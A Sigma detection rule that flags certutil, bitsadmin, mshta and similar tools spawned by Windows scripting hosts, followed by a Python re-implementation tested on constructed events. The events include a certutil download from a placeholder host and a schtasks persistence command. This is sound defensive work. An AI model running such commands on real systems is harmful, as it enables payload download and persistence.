Techniques
Sample rules
Windows Shell/Scripting Processes Spawning Suspicious Programs
- source: sigma
- techniques:
- t1059
- t1059.001
- t1059.005
- t1218
Description
Detects suspicious child processes (schtasks, nslookup, certutil, bitsadmin, mshta) spawned by Windows shell and scripting hosts such as wscript, cscript, rundll32, regsvr32, powershell, wmiprvse and mshta.
Detection logic
selection:
    Image|endswith:
        - \schtasks.exe
        - \nslookup.exe
        - \certutil.exe
        - \bitsadmin.exe
        - \mshta.exe
    ParentImage|endswith:
        - \mshta.exe
        - \powershell.exe
        - \pwsh.exe
        - \rundll32.exe
        - \cscript.exe
        - \wscript.exe
        - \wmiprvse.exe
        - \regsvr32.exe
filter_amazon:
    ParentCommandLine|contains:
        - \Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1
        - \Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1
        - \Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1
        - \nessus_
filter_ccmcache:
    CurrentDirectory|contains: \ccmcache\
filter_nessus:
    CommandLine|contains: \nessus_
filter_sccm_install:
    CommandLine|contains|all:
        - C:\MEM_Configmgr_
        - \SMSSETUP\BIN\
        - \autorun.hta
        - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
    Image|endswith: \mshta.exe
    ParentCommandLine|contains|all:
        - C:\MEM_Configmgr_
        - \splash.hta
        - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
    ParentImage|endswith: \mshta.exe
condition: selection and not 1 of filter_*
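The following is an added example, not code from the page or from the Sigma project: it re-implements the rule's detection logic in plain Python and evaluates it against a handful of constructed process-creation events (Sysmon-style field names Image, ParentImage, CommandLine, ParentCommandLine, CurrentDirectory, as used by Sigma's process_creation logsource). It applies Sigma's semantics as written: string modifiers match case-insensitively, list values within one field are ORed, fields within one selection or filter map are ANDed, and `1 of filter_*` means a single matching filter suppresses the alert. All event data, paths and the `ev()` helper are constructed for illustration.

```python
# Added example: evaluate the Sigma rule above over constructed events.
# Not part of the original page; field names follow Sigma's process_creation
# logsource, event contents are made up.

SELECTION_IMAGE = ["\\schtasks.exe", "\\nslookup.exe", "\\certutil.exe",
                   "\\bitsadmin.exe", "\\mshta.exe"]
SELECTION_PARENT = ["\\mshta.exe", "\\powershell.exe", "\\pwsh.exe",
                    "\\rundll32.exe", "\\cscript.exe", "\\wscript.exe",
                    "\\wmiprvse.exe", "\\regsvr32.exe"]
AMAZON_SCRIPTS = [
    "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1",
    "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\set-selfhealing.ps1",
    "\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\check-workspacehealth.ps1",
    "\\nessus_",
]
SCCM_GUID = "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}"


# Sigma string modifiers compare case-insensitively; a list of values is ORed.
def _endswith_any(value, suffixes):
    v = (value or "").lower()
    return any(v.endswith(s.lower()) for s in suffixes)

def _contains_any(value, needles):
    v = (value or "").lower()
    return any(n.lower() in v for n in needles)

def _contains_all(value, needles):          # the |all modifier: every needle
    v = (value or "").lower()
    return all(n.lower() in v for n in needles)


def selection(e):
    # Keys inside one map are ANDed: suspicious child AND scripting-host parent.
    return (_endswith_any(e.get("Image"), SELECTION_IMAGE)
            and _endswith_any(e.get("ParentImage"), SELECTION_PARENT))

def filter_amazon(e):
    return _contains_any(e.get("ParentCommandLine"), AMAZON_SCRIPTS)

def filter_ccmcache(e):
    return _contains_any(e.get("CurrentDirectory"), ["\\ccmcache\\"])

def filter_nessus(e):
    return _contains_any(e.get("CommandLine"), ["\\nessus_"])

def filter_sccm_install(e):
    # All four fields must match for this filter to fire.
    return (_contains_all(e.get("CommandLine"),
                          ["C:\\MEM_Configmgr_", "\\SMSSETUP\\BIN\\", "\\autorun.hta", SCCM_GUID])
            and _endswith_any(e.get("Image"), ["\\mshta.exe"])
            and _contains_all(e.get("ParentCommandLine"),
                              ["C:\\MEM_Configmgr_", "\\splash.hta", SCCM_GUID])
            and _endswith_any(e.get("ParentImage"), ["\\mshta.exe"]))

FILTERS = [filter_amazon, filter_ccmcache, filter_nessus, filter_sccm_install]

def matches(e):
    """condition: selection and not 1 of filter_*"""
    return selection(e) and not any(f(e) for f in FILTERS)


# Constructed events (hypothetical hosts, users and paths).
def ev(eid, image, parent, cmd="", pcmd="", cwd=""):
    return {"id": eid, "Image": image, "ParentImage": parent,
            "CommandLine": cmd, "ParentCommandLine": pcmd, "CurrentDirectory": cwd}

SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    # HTA dropping a file via certutil: selection hits, no filter -> alert
    ev("hta-certutil", SYS32 + "certutil.exe", SYS32 + "mshta.exe",
       cmd="certutil -urlcache -f http://example.invalid/a.txt a.txt",
       pcmd="mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.hta", cwd="C:\\Users\\u\\"),
    # WSH script persisting via schtasks; upper-case path shows case-insensitivity
    ev("wsh-schtasks", "C:\\WINDOWS\\SYSTEM32\\SCHTASKS.EXE", SYS32 + "wscript.exe",
       cmd="schtasks /create /tn Updater /tr C:\\Users\\u\\u.vbs /sc minute",
       pcmd="wscript.exe C:\\Users\\u\\u.vbs", cwd="C:\\Users\\u\\"),
    # Same shape, but run from SCCM's ccmcache -> filter_ccmcache
    ev("sccm-ccmcache", SYS32 + "schtasks.exe",
       SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe", cmd="schtasks /query",
       pcmd="powershell.exe -File install.ps1", cwd="C:\\Windows\\ccmcache\\1a\\"),
    # Nessus credentialed-scan helper -> filter_nessus
    ev("nessus-scan", SYS32 + "nslookup.exe", SYS32 + "cscript.exe",
       cmd="nslookup host > C:\\Windows\\Temp\\nessus_12345\\out.txt"),
    # Amazon WorkSpaces setup script -> filter_amazon
    ev("amazon-workspaces", SYS32 + "schtasks.exe",
       SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
       pcmd='powershell.exe -File "C:\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1"'),
    # SCCM installer mshta -> mshta chain -> filter_sccm_install (all fields match)
    ev("sccm-install", SYS32 + "mshta.exe", SYS32 + "mshta.exe",
       cmd="mshta.exe C:\\MEM_Configmgr_2303\\SMSSETUP\\BIN\\I386\\autorun.hta " + SCCM_GUID,
       pcmd="mshta.exe C:\\MEM_Configmgr_2303\\splash.hta " + SCCM_GUID),
    # certutil from explorer: parent not a scripting host -> outside selection
    ev("explorer-certutil", SYS32 + "certutil.exe", "C:\\Windows\\explorer.exe",
       cmd="certutil -hashfile setup.msi SHA256"),
]

def run(events=SAMPLE_EVENTS):
    """Return the ids of events the rule would alert on."""
    return [e["id"] for e in events if matches(e)]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['id']:<18} selection={selection(e)!s:<5} alert={matches(e)}")
```

Note that `filter_sccm_install` only suppresses when every one of its four fields matches; an mshta child of mshta whose command line lacks the GUID or the SMSSETUP path still alerts, which is the intended behaviour for a tightly scoped installer exclusion.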